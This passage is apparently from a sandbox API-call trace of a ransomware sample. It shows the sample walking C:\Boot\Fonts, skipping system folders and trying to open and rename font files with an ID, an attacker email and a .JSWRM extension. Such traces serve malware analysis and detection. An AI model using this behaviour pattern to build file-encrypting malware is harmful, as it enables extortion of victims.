hHeap=0x1e0000) returned 1 [0063.881] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20de78 | out: hHeap=0x1e0000) returned 1 [0063.881] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20e418 | out: hHeap=0x1e0000) returned 1 [0063.881] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411c8 | out: hHeap=0x1e0000) returned 1 [0063.882] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241060 | out: hHeap=0x1e0000) returned 1 [0063.882] FindNextFileW (in: hFindFile=0x232180, lpFindFileData=0x345f360 | out: lpFindFileData=0x345f360*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc4c0da69, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef97d9ab, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xf24aec9d, ftLastWriteTime.dwHighDateTime=0x1d2a02f, nFileSizeHigh=0x0, nFileSizeLow=0x14f66, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="segoen_slboot.ttf", cAlternateFileName="SEGOEN~1.TTF")) returned 1 [0063.882] lstrcmpiW (lpString1="segoen_slboot.ttf", lpString2=".") returned 1 [0063.882] lstrcmpiW (lpString1="segoen_slboot.ttf", lpString2="..") returned 1 [0063.882] lstrcmpiW (lpString1="segoen_slboot.ttf", lpString2="...") returned 1 [0063.882] lstrcmpiW (lpString1="segoen_slboot.ttf", lpString2="windows") returned -1 [0063.882] lstrcmpiW (lpString1="segoen_slboot.ttf", lpString2="recovery") returned 1 [0063.882] lstrcmpiW (lpString1="segoen_slboot.ttf", lpString2="perflogs") returned 1 [0063.882] lstrcmpiW (lpString1="segoen_slboot.ttf", lpString2="documents and settings") returned 1 [0063.882] lstrcmpiW (lpString1="segoen_slboot.ttf", lpString2="$RECYCLE.BIN") returned 1 [0063.882] lstrcmpiW (lpString1="segoen_slboot.ttf", lpString2="system volume information") returned -1 [0063.882] lstrcmpiW (lpString1="segoen_slboot.ttf", lpString2="msocache") returned 1 [0063.882] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f84e8 [0063.882] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="segoen_slboot.ttf", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0063.882] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241038 [0063.882] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="segoen_slboot.ttf", cchWideChar=17, lpMultiByteStr=0x241038, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="segoen_slboot.ttf", lpUsedDefaultChar=0x0) returned 17 [0063.882] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f84e8 | out: hHeap=0x1e0000) returned 1 [0063.882] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8638 [0063.882] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="segoen_slboot.ttf", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0063.882] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2412e0 [0063.882] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="segoen_slboot.ttf", cchWideChar=17, lpMultiByteStr=0x2412e0, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="segoen_slboot.ttf", lpUsedDefaultChar=0x0) returned 17 [0063.882] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8638 | out: hHeap=0x1e0000) returned 1 [0063.882] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20e418 [0063.882] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20e268 | out: hHeap=0x1e0000) returned 1 [0063.882] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0063.882] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345f334, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0063.882] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20de78 [0063.882] CreateFileW (lpFileName="C:\\Boot\\Fonts\\segoen_slboot.ttf" (normalized: "c:\\boot\\fonts\\segoen_slboot.ttf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0063.882] GetFileSizeEx (in: hFile=0xffffffff, lpFileSize=0x345f2c8 | out: lpFileSize=0x345f2c8*=9257990987243128) returned 0 [0063.882] SetFilePointer (in: hFile=0xffffffff, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xffffffff [0063.883] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x27100) returned 0x2471a8 [0063.883] ReadFile (in: hFile=0xffffffff, lpBuffer=0x2471a8, nNumberOfBytesToRead=0x27100, lpNumberOfBytesRead=0x345f2d4, lpOverlapped=0x0 | out: lpBuffer=0x2471a8, lpNumberOfBytesRead=0x345f2d4*=0x0, lpOverlapped=0x0) returned 0 [0063.883] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2471a8 | out: hHeap=0x1e0000) returned 1 [0063.883] CloseHandle (hObject=0xffffffff) returned 1 [0063.883] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dec0 [0063.883] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0063.883] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f87c0 [0063.883] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x1f87c0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0063.883] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8670 [0063.883] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f87c0 | out: hHeap=0x1e0000) returned 1 [0063.883] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0063.883] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a210 [0063.883] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a210, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0063.883] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a210 | out: hHeap=0x1e0000) returned 1 [0063.883] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c220 [0063.883] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x76) returned 0x226630 [0063.883] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c220 | out: hHeap=0x1e0000) returned 1 [0063.883] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x2363b0 [0063.883] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x226630 | out: hHeap=0x1e0000) returned 1 [0063.883] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8670 | out: hHeap=0x1e0000) returned 1 [0063.883] MoveFileW (lpExistingFileName="C:\\Boot\\Fonts\\segoen_slboot.ttf" (normalized: "c:\\boot\\fonts\\segoen_slboot.ttf"), lpNewFileName="C:\\Boot\\Fonts\\segoen_slboot.ttf.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\boot\\fonts\\segoen_slboot.ttf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 0 [0063.883] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2363b0 | out: hHeap=0x1e0000) returned 1 [0063.883] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dec0 | out: hHeap=0x1e0000) returned 1 [0063.883] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20de78 | out: hHeap=0x1e0000) returned 1 [0063.883] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2412e0 | out: hHeap=0x1e0000) returned 1 [0063.883] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241038 | out: hHeap=0x1e0000) returned 1 [0063.883] FindNextFileW (in: hFindFile=0x232180, lpFindFileData=0x345f360 | out: lpFindFileData=0x345f360*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc4c33ce4, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef98c419, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xf24aec9d, ftLastWriteTime.dwHighDateTime=0x1d2a02f, nFileSizeHigh=0x0, nFileSizeLow=0x150a2, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="segoe_slboot.ttf", cAlternateFileName="SEGOE_~1.TTF")) returned 1 [0063.883] lstrcmpiW (lpString1="segoe_slboot.ttf", lpString2=".") returned 1 [0063.883] lstrcmpiW (lpString1="segoe_slboot.ttf", lpString2="..") returned 1 [0063.883] lstrcmpiW (lpString1="segoe_slboot.ttf", lpString2="...") returned 1 [0063.883] lstrcmpiW (lpString1="segoe_slboot.ttf", lpString2="windows") returned -1 [0063.884] lstrcmpiW (lpString1="segoe_slboot.ttf", lpString2="recovery") returned 1 [0063.884] lstrcmpiW (lpString1="segoe_slboot.ttf", lpString2="perflogs") returned 1 [0063.884] lstrcmpiW (lpString1="segoe_slboot.ttf", lpString2="documents and settings") returned 1 [0063.884] lstrcmpiW (lpString1="segoe_slboot.ttf", lpString2="$RECYCLE.BIN") returned 1 [0063.884] lstrcmpiW (lpString1="segoe_slboot.ttf", lpString2="system volume information") returned -1 [0063.884] lstrcmpiW (lpString1="segoe_slboot.ttf", lpString2="msocache") returned 1 [0063.884] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8638 [0063.884] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="segoe_slboot.ttf", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0063.884] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241330 [0063.884] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="segoe_slboot.ttf", cchWideChar=16, lpMultiByteStr=0x241330, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="segoe_slboot.ttf", lpUsedDefaultChar=0x0) returned 16 [0063.884] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8638 | out: hHeap=0x1e0000) returned 1 [0063.884] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8328 [0063.884] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="segoe_slboot.ttf", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0063.884] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2411c8 [0063.884] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="segoe_slboot.ttf", cchWideChar=16, lpMultiByteStr=0x2411c8, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="segoe_slboot.ttf", lpUsedDefaultChar=0x0) returned 16 [0063.884] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8328 | out: hHeap=0x1e0000) returned 1 [0063.884] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20de78 [0063.884] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20e418 | out: hHeap=0x1e0000) returned 1 [0063.884] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0063.884] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345f334, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0063.884] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20e268 [0063.884] CreateFileW (lpFileName="C:\\Boot\\Fonts\\segoe_slboot.ttf" (normalized: "c:\\boot\\fonts\\segoe_slboot.ttf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0063.884] GetFileSizeEx (in: hFile=0xffffffff, lpFileSize=0x345f2c8 | out: lpFileSize=0x345f2c8*=9251806234337896) returned 0 [0063.884] SetFilePointer (in: hFile=0xffffffff, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xffffffff [0063.884] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x27100) returned 0x2471a8 [0063.884] ReadFile (in: hFile=0xffffffff, lpBuffer=0x2471a8, nNumberOfBytesToRead=0x27100, lpNumberOfBytesRead=0x345f2d4, lpOverlapped=0x0 | out: lpBuffer=0x2471a8, lpNumberOfBytesRead=0x345f2d4*=0x0, lpOverlapped=0x0) returned 0 [0063.884] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2471a8 | out: hHeap=0x1e0000) returned 1 [0063.884] CloseHandle (hObject=0xffffffff) returned 1 [0063.884] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20e418 [0063.884] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0063.884] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f84e8 [0063.885] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x1f84e8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0063.885] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8638 [0063.885] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f84e8 | out: hHeap=0x1e0000) returned 1 [0063.885] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0063.885] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a360 [0063.885] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a360, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0063.885] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a360 | out: hHeap=0x1e0000) returned 1 [0063.885] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c6f0 [0063.885] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x76) returned 0x225b30 [0063.885] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c6f0 | out: hHeap=0x1e0000) returned 1 [0063.885] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236800 [0063.885] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x225b30 | out: hHeap=0x1e0000) returned 1 [0063.885] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8638 | out: hHeap=0x1e0000) returned 1 [0063.885] MoveFileW (lpExistingFileName="C:\\Boot\\Fonts\\segoe_slboot.ttf" (normalized: "c:\\boot\\fonts\\segoe_slboot.ttf"), lpNewFileName="C:\\Boot\\Fonts\\segoe_slboot.ttf.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\boot\\fonts\\segoe_slboot.ttf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 0 [0063.885] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236800 | out: hHeap=0x1e0000) returned 1 [0063.885] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20e418 | out: hHeap=0x1e0000) returned 1 [0063.885] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20e268 | out: hHeap=0x1e0000) returned 1 [0063.885] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411c8 | out: hHeap=0x1e0000) returned 1 [0063.885] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241330 | out: hHeap=0x1e0000) returned 1 [0063.885] FindNextFileW (in: hFindFile=0x232180, lpFindFileData=0x345f360 | out: lpFindFileData=0x345f360*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc4c33ce4, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef999ae4, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xf24aec9d, ftLastWriteTime.dwHighDateTime=0x1d2a02f, nFileSizeHigh=0x0, nFileSizeLow=0xbfc3, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="wgl4_boot.ttf", cAlternateFileName="WGL4_B~1.TTF")) returned 1 [0063.885] lstrcmpiW (lpString1="wgl4_boot.ttf", lpString2=".") returned 1 [0063.885] lstrcmpiW (lpString1="wgl4_boot.ttf", lpString2="..") returned 1 [0063.885] lstrcmpiW (lpString1="wgl4_boot.ttf", lpString2="...") returned 1 [0063.885] lstrcmpiW (lpString1="wgl4_boot.ttf", lpString2="windows") returned -1 [0063.885] lstrcmpiW (lpString1="wgl4_boot.ttf", lpString2="recovery") returned 1 [0063.885] lstrcmpiW (lpString1="wgl4_boot.ttf", lpString2="perflogs") returned 1 [0063.885] lstrcmpiW (lpString1="wgl4_boot.ttf", lpString2="documents and settings") returned 1 [0063.885] lstrcmpiW (lpString1="wgl4_boot.ttf", lpString2="$RECYCLE.BIN") returned 1 [0063.885] lstrcmpiW (lpString1="wgl4_boot.ttf", lpString2="system volume information") returned 1 [0063.885] lstrcmpiW (lpString1="wgl4_boot.ttf", lpString2="msocache") returned 1 [0063.885] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241010 [0063.886] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="wgl4_boot.ttf", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0063.886] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="wgl4_boot.ttf", cchWideChar=13, lpMultiByteStr=0x345f610, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="wgl4_boot.ttf", lpUsedDefaultChar=0x0) returned 13 [0063.886] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241010 | out: hHeap=0x1e0000) returned 1 [0063.886] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0063.886] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="wgl4_boot.ttf", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0063.886] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="wgl4_boot.ttf", cchWideChar=13, lpMultiByteStr=0x345f5e0, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="wgl4_boot.ttf", lpUsedDefaultChar=0x0) returned 13 [0063.886] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0063.886] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20e268 [0063.886] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20de78 | out: hHeap=0x1e0000) returned 1 [0063.886] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0063.886] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345f334, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0063.886] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20e418 [0063.886] CreateFileW (lpFileName="C:\\Boot\\Fonts\\wgl4_boot.ttf" (normalized: "c:\\boot\\fonts\\wgl4_boot.ttf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0063.886] GetFileSizeEx (in: hFile=0xffffffff, lpFileSize=0x345f2c8 | out: lpFileSize=0x345f2c8*=9256135561372696) returned 0 [0063.886] SetFilePointer (in: hFile=0xffffffff, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xffffffff [0063.886] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x27100) returned 0x2471a8 [0063.886] ReadFile (in: hFile=0xffffffff, lpBuffer=0x2471a8, nNumberOfBytesToRead=0x27100, lpNumberOfBytesRead=0x345f2d4, lpOverlapped=0x0 | out: lpBuffer=0x2471a8, lpNumberOfBytesRead=0x345f2d4*=0x0, lpOverlapped=0x0) returned 0 [0063.886] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2471a8 | out: hHeap=0x1e0000) returned 1 [0063.886] CloseHandle (hObject=0xffffffff) returned 1 [0063.886] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20de78 [0063.886] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0063.886] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f84e8 [0063.886] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x1f84e8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0063.886] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8328 [0063.886] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f84e8 | out: hHeap=0x1e0000) returned 1 [0063.886] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0063.886] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a240 [0063.886] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a240, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0063.886] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a240 | out: hHeap=0x1e0000) returned 1 [0063.887] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22bda8 [0063.887] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x76) returned 0x226430 [0063.887] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22bda8 | out: hHeap=0x1e0000) returned 1 [0063.887] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x2362f8 [0063.887] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x226430 | out: hHeap=0x1e0000) returned 1 [0063.887] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8328 | out: hHeap=0x1e0000) returned 1 [0063.887] MoveFileW (lpExistingFileName="C:\\Boot\\Fonts\\wgl4_boot.ttf" (normalized: "c:\\boot\\fonts\\wgl4_boot.ttf"), lpNewFileName="C:\\Boot\\Fonts\\wgl4_boot.ttf.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\boot\\fonts\\wgl4_boot.ttf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 0 [0063.887] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2362f8 | out: hHeap=0x1e0000) returned 1 [0063.887] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20de78 | out: hHeap=0x1e0000) returned 1 [0063.887] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20e418 | out: hHeap=0x1e0000) returned 1 [0063.887] FindNextFileW (in: hFindFile=0x232180, lpFindFileData=0x345f360 | out: lpFindFileData=0x345f360*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc4c33ce4, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef999ae4, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xf24aec9d, ftLastWriteTime.dwHighDateTime=0x1d2a02f, nFileSizeHigh=0x0, nFileSizeLow=0xbfc3, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="wgl4_boot.ttf", cAlternateFileName="WGL4_B~1.TTF")) returned 0 [0063.887] FindClose (in: hFindFile=0x232180 | out: hFindFile=0x232180) returned 1 [0063.887] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20e268 | out: hHeap=0x1e0000) returned 1 [0063.887] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241128 | out: hHeap=0x1e0000) returned 1 [0063.887] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240fe8 | out: hHeap=0x1e0000) returned 1 [0063.887] FindNextFileW (in: hFindFile=0x231d00, lpFindFileData=0x345f6c8 | out: lpFindFileData=0x345f6c8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc487a0b9, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xc48a0490, ftLastAccessTime.dwHighDateTime=0x1d32764, ftLastWriteTime.dwLowDateTime=0xc48a0490, ftLastWriteTime.dwHighDateTime=0x1d32764, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xfffffffe, dwReserved1=0x345f828, cFileName="fr-CA", 